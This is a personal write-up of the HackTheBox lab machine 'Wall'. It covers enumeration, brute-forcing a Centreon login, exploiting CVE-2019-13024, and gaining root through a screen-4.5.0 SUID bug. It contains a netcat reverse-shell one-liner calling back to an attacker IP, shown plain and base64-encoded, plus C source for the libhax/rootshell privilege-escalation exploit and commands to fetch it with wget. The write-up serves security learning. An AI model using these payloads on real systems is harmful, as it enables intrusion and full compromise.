data:image/s3,"s3://crabby-images/16249/16249cb326b96b199cb6347c24b780a97ed6f344" alt="Wall machine details HackTheBox-Wall/Nmap.png"
Quick Summary
→ Wall is my very first machine on HackTheBox that I hacked. It is running in Web Application that vulnerable to RCE
(Remote Code Execution), a classification of security vulnerabilities. RCE
enables a remote attacker to execute arbitrary code, bypassing security authorization, and by abusing this vulnerabilities I manage to get in into the machine. First I fall on to the rabbit hole which is the aa.php
, and server-status
page. The tricky part of this machine was finding the hidden page of the web application because it’s not something normally shows up in the wordlists. I use the Burp Suite and edit the Request fo find some interesting stuffs and then i found the right page of the webapps. The vulnerability inside is a SUID
binary which users can get a full privileges.
Penetration Testing Methodologies
Network Scanning
→ Nmap scan
→ discover open ports and what services are running
Enumeration
→ Browsing the HTTP Service
→ Bruteforce the Web page directories
→ Finding the hidden page
Post - Exploitation
→ Exploring the web page
→ Bruteforce the credentials using the token
→ Logging in as admin
Exploitation
→ Getting the Reverse shell using CVE-2019-13024.
→ Find some interesting things
→ Check Linux Binaries
Privilege Escalation
→ Exploit the unusual Linux binaries
→ Execute the exploit
→ Get the root shell and read the root and user file
Network Scanning
Walkthrough
→ First, is to scan the target IP using Nmap to get information about the various services that are running on the target machine. We use
- -sV ⇒ Probe open ports to determine service/version info
- -sC ⇒ equivalent to —script=default
- -A ⇒ Enable OS detection, version detection, script scanning, and traceroute
- -oN ⇒ to save our scan results to a text file
nmap -sV -sC -A 10.10.10.157 -oN nmap-Wall
|
Nmap results
data:image/s3,"s3://crabby-images/5d64f/5d64f3b6a00b9ec6aa63dbc4813129ab9bef5c94" alt="Nmap Results HackTheBox-Wall/Nmap.png"
Enumeration
By visiting the http page we got the default page of Apache Web Server
data:image/s3,"s3://crabby-images/84c26/84c26ba11cabd5f023dd2d4bf150ce66039a8c1b" alt="Apache Defaul page HackTheBox-Wall/default_page.png"
We try to explore the default page by inspecting the source code but I can’t find any interesting things there so I’ll try to bruteforce the directories to look for hidden page. I use gobuster with medium.txt file. To save the outfile we use -o
name of a file
gobuster dir -u http://10.10.10.157 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -o wall-dir
|
data:image/s3,"s3://crabby-images/3497d/3497d3c201889471ec45300eaf1244c59c2377d9" alt="Gobuster HackTheBox-Wall/gobuster.png"
After a minutes of bruteforcing I got the following directories.
→ /aa.php (Status: 200)
→ /server-status (Status: 401)
→ /monitoring (Status: 403)
|
Now let’s take a look with the following page I got. First the “aa.php”
http://10.10.10.157/aa.php
data:image/s3,"s3://crabby-images/96dd5/96dd58135d0d13213c3a6176626b3ca8de76e248" alt="aa.php page HackTheBox-Wall/aa_page.png"
No interesting things here.
So next the server-status
page
http://10.10.10.157/server-status
data:image/s3,"s3://crabby-images/81a66/81a66508acdca8d23da8eb871b10ebd8b0861e41" alt="forbidden page HackTheBox-Wall/forbidden.png"
And I got the Forbidden page.
Next the is the monitoring
page
http://10.10.10.157/monitoring
data:image/s3,"s3://crabby-images/532d5/532d54e6c46c9d441c6a4f09ae5f847b2b415937" alt="monitoring page HackTheBox-Wall/monitoring.png"
And I got a pop-up login. This page is very interesting but I don’t have any credentials so i will leave this for a while and try to enumerate again the machine using Nikto - Web Server scanner.
nikto -h http://10.10.10.157/
|
Nikto results
data:image/s3,"s3://crabby-images/f8ec8/f8ec8ab6449240344de5a34214fca602d1d5bcf0" alt="nikto results HackTheBox-Wall/nikto.png"
Next is I will intercept this request with BurpSuite (A Web Penetration Testing tool) and send this to Repeater.
data:image/s3,"s3://crabby-images/f6806/f68062d36f730fcdfd9bcedf1c39ea87574ddf76" alt="Burp Suite HackTheBox-Wall/burp.png"
Repeater
data:image/s3,"s3://crabby-images/105d1/105d1cbe4580d4b3766439d88f367752b7e588c1" alt="Burp Suite Repeater HackTheBox-Wall/burp_repeater.png"
Now we will change the request body method into “POST” and let’s see what response we can get.
data:image/s3,"s3://crabby-images/8678c/8678ce0b9097e392c8b45726b41889258f1ed349" alt="The centreon page HackTheBox-Wall/burp_centreon.png"
As you can see there’s a redirected page in URL='/centreon'
so I try this on browser to find out what is this.
data:image/s3,"s3://crabby-images/0f2db/0f2dbcc195ad36b197955a66319d18125a8f6483" alt="HackTheBox-Wall/centreon_login.png"
Centreon Login Page v. 19.04
Then a Centreon Login page with version 19.04. Centreon is an open source infrastructure monitoring software.
Based on some googling for default creds also in the documentation of the software, I tried all combinations of “centreon”, “admin”, and “root”, but didn’t get logged in.
Post - Exploitation
Finding Exploit
I try to explore the login page by viewing the page source code and try to look if there’s any interesting things.
I also google the version of the Centreon v19.04
and I found out that the version of this software is vulnerable to RCE(Remote Code Execution) attack.
Login page view page source
data:image/s3,"s3://crabby-images/6ebda/6ebdaa79ca5efab994d4e5e1a5d430e80513e538" alt="Page source HackTheBox-Wall/view_source.png"
Brute Force the Credentials
By viewing the page source code, there’s a hidden value of Centreon CSRF
token. After some research luckily I found this script on Github that can use to bruteforce the logins which are using anti-CSRF
tokens to stop you from brute forcing them. I try to use this by the following commands based on the instructions of the script.
python3 brutecsrf.py --url http://test.com/index.php --csrf name_csrf_token_in_HTML_form --u admin --fuser user_name_in_HTML_form --passwd password_name_in_HTML_form
|
data:image/s3,"s3://crabby-images/61b45/61b450f5cfcad399bf3f40dfe473ec567e963a66" alt="Login page password HackTheBox-Wall/password1.png"
After a minute I get the “password1” now try to use this password for login with default username “admin” ;) then I can now logged in !
data:image/s3,"s3://crabby-images/8f34d/8f34d8dccd498b48ff50d52965ea71130fe15a39" alt="HackTheBox-Wall/centreon.png"
Centreon Main Page
Exploitation
We know that the Centreon version on this machine was vulnerable to RCE(Remote Code Execution) attack. So I did search on Google to find an article about it and what I saw was article from creator (Askar) of this box.
data:image/s3,"s3://crabby-images/709b3/709b3392674917c431983d902843cf6770a3221a" alt="HackTheBox-Wall/google1.png"
Exploit Blog for Centreon
Centreon v19.04 Remote Code Execution. (CVE-2019-13024)
Centreon v19.04 Remote Code Execution (CVE-2019-13024) - Shells.Systems
Estimated Reading Time: 6 minutes Summary about Centreon Centreon is a free and open source infrastructure monitoring software, Centreon al…
The exploitation triggers by adding an arbitrary command in the nagios_bin
parameter when setup a new configuration or update configuration for a poller.
data:image/s3,"s3://crabby-images/7f6b0/7f6b0191bd4f260b5451968d11ba0efd1c20a304" alt="HackTheBox-Wall/payload_line.png"
Based on the blog we can set a payload in Monitoring Engine Binary
.
I tried to use the exploit script but it’s not working, I didn’t get a reverse shell, my Ncat listener can’t get any response whenever I run the exploit even I modified it.
So i tried to encode my payload into base64 hoping that this one will work.
rm /tmp/x22;mkfifo /tmp/xx2;cat /tmp/xx2|/bin/sh -i 2>&1|/bin/nc 10.10.15.44 666 >/tmp/xx2
cm0gL3RtcC94MjI7bWtmaWZvIC90bXAveHgyO2NhdCAvdG1wL3h4MnwvYmluL3NoIC1pIDI+JjF8L2Jpbi9uYyAxMC4xMC4xNS40NCA2NjYgPi90bXAveHgy
|
Now I will paste our base64 code payload into Monitoring Engine Binary
.
In the exploit script i will paste my payload too in nagios_bin
line. with echo${IFS}
After running the exploit with my Ncat listener, still didn’t work. So I tried to search again on Google to look for other exploit of Centreon RCE and i found this. Same procedure I will paste again my payload to nagios_bin
line and next is run the exploit with my Ncat listener.
./centreon_rce.py -t http://10.10.10.157/centreon -u admin -p password1
|
WWW-DATA SHELL -> shelby
Running this and we now get the www-data shell.
data:image/s3,"s3://crabby-images/4587f/4587f16862d0246a7e49638df742d1aa72df5cef" alt="WWW-DATA SHELL HackTheBox-Wall/www_data_shell.png"
As you can see Bash’s job control is turned off. using this line we can enable bash command in the shell.
Now I can use commands like “id”.
$ id uid=33(www-data) gid=33(www-data) groups=33(www-data),6000(centreon)
|
upgrade the shell with python
python -c 'import pty; pty.spawn("/bin/bash");'
|
data:image/s3,"s3://crabby-images/ef441/ef441f188d669144b2f50915117ded46305ed43f" alt="www-data@Wall shell HackTheBox-Wall/right_shell.png"
Privilege Escalation
Linux SUID Binaries
Now it’s time to find some interesting things in this machine that I can use for Privilege Escalation. First I look into Linux SUID binaries. and I spotted something odd, the screen
with version 4-5.0 was the biggest hint for me.
find / -perm -4000 2>/dev/null | xargs ls -la
|
data:image/s3,"s3://crabby-images/2930d/2930daaaae4ba4026c7be40027aec297911e5dff" alt="screen-4-5.0 HackTheBox-Wall/screen.png"
Screen 4-5.0
If you are familiar with Linux SUID’ you will notice that the “/bin/screen-4.5.0” is not a normally or default Linux suid so this one is very interesting so trying to use Searchsploit if there’s an existing exploit in “screen-4.5.0”. And there is.
data:image/s3,"s3://crabby-images/9e2a7/9e2a7152d28b6854c940c2a4ed312646b22555a5" alt="searchsploit results HackTheBox-Wall/searchsploit.png"
I read first the .txt file of the exploit to know on how can I use this for exploitation.
searchsploit -x exploits/linux/local/41152.txt
|
data:image/s3,"s3://crabby-images/41ecf/41ecfee9d34cf41e143f2993cf3905b271261bc0" alt="screen readme HackTheBox-Wall/screen_readme.png"
It check opens the logfile with full root privileges. This allows us to truncate any file or create a root-owned file with any contents in any directory and can be easily exploited to full root acces in several ways.
Base on the instructions of the exploit, I will try to create a file “bla-bla” then use this commands “ls -la”
screen -D -m -L bla.bla echo fail
ls -la
|
data:image/s3,"s3://crabby-images/7e306/7e306919fc3244913b8aefd798aa776a224f5e29" alt="blabla HackTheBox-Wall/blabla.png"
As you can see, the “bla.bla” file is owned by root.
I will now use the exploit script we get on the searchsploit, but it didn’t work properly so I did it manually, first I compiled the binaries on my Kali machine:
libhax.c - code
#include <stdio.h> #include <sys/types.h> #include <unistd.h> __attribute__ ((__constructor__)) void dropshell(void){ chown("/tmp/rootshell", 0, 0); chmod("/tmp/rootshell", 04755); unlink("/etc/ld.so.preload"); printf("[+] done!\n"); }
|
rootshell.c - code
#include <stdio.h> int main(void){ setuid(0); setgid(0); seteuid(0); setegid(0); execvp("/bin/sh", NULL, NULL); }
|
Now is to compile this two exploit.
gcc -fPIC -shared -ldl -o libhax.so libhax.c
gcc -o rootshell rootshell.c
|
After I compile the exploit i’ll transfer it to the target. To transfer the file I set a local HTTP Server in my Kali machine.
python -m SimpleHTTPServer 80
|
to download it into Wall machine, we can use wget
commands in the tmp
directory.
wget http://10.10.15.44/libhax.so
wget http://10.10.15.44/libhax.c
|
Going to Root
Now i will go to the “/etc/“ directories in the target and do the exploit
www-data@Wall:/tmp$ cd /etc cd /etc www-data@Wall:/etc$ umask 000 umask 000 www-data@Wall:/etc$ /bin/screen-4.5.0 -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" /libhax.so"-4.5.0 -D -m -L ld.so.preload echo -ne "\x0a/tmp/ www-data@Wall:/etc$ /bin/screen-4.5.0 -ls /bin/screen-4.5.0 -ls ' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored. [+] done! No Sockets found in /tmp/screens/S-www-data.
|
Now going to “/tmp/rootshell”
www-data@Wall:/etc$ /tmp/rootshell /tmp/rootshell # id id uid=0(root) gid=0(root) groups=0(root),33(www-data),6000(centreon) # cat /home/shelby/user.txt | wc -c cat /home/shelby/user.txt | wc -c 33 # cat /root/root.txt | wc -c cat /root/root.txt | wc -c 33 #
|
data:image/s3,"s3://crabby-images/9f5d3/9f5d3c600445091cab0b541c7abe10c19a814593" alt="Machine Pawned!! HackTheBox-Wall/rooted!!.png"
Now that I’m root, I can now grab both flags – user.txt
& root.txt
:)
If you liked my writeup please leave a respect on my Profile
data:image/s3,"s3://crabby-images/24656/24656fdb0b81d1affbd27006ac890802d8d10dc1" alt="Payas0 Payas0"